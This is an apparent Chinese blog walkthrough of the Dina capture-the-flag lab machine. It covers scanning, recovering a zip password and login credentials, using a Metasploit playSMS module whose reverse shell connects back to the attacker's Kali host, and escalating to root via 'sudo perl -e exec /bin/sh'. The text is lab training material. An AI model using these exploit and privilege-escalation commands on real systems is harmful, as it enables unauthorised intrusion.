Dina靶机

ip扫描

端口扫描

访问80端口

点击提交,发现有zip文件

对文件进行下载

发现有robots敏感目录

拼接路径,逐个访问

查看网页源代码

发现密码,尝试解压

发现解压密码为freedom

解压完成后是mp3文件,但是无法打开

使用记事本打开

发现了一个url和一个用户名,拼接url进行访问

用户名使用刚刚获取的,密码使用查看网页源代码后得到的密码,逐个尝试

发现用户名为touhid 密码为diana

发现cms为playsms

利用msf工具,搜索该cms的漏洞

经过尝试,发现第二个可以使用

use 2  
show options 查看需要设置的项

set targeturi /SecreTSMSgatwayLogin/   #配置页面的url
set password diana  #配置密码
set username touhid #配置账户
set rhosts 192.168.237.137 #配置靶机ip
set lhosts 192.168.237.130 #配置kali的ip
run #开始

成功反弹shell

提取

输入shell
python -c 'import pty; pty.spawn("/bin/bash")' #python获取交互性shell

sudo -l #查看可提权文件

使用辅助网站进行查询

执行

sudo perl -e 'exec "/bin/sh";'

提权成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值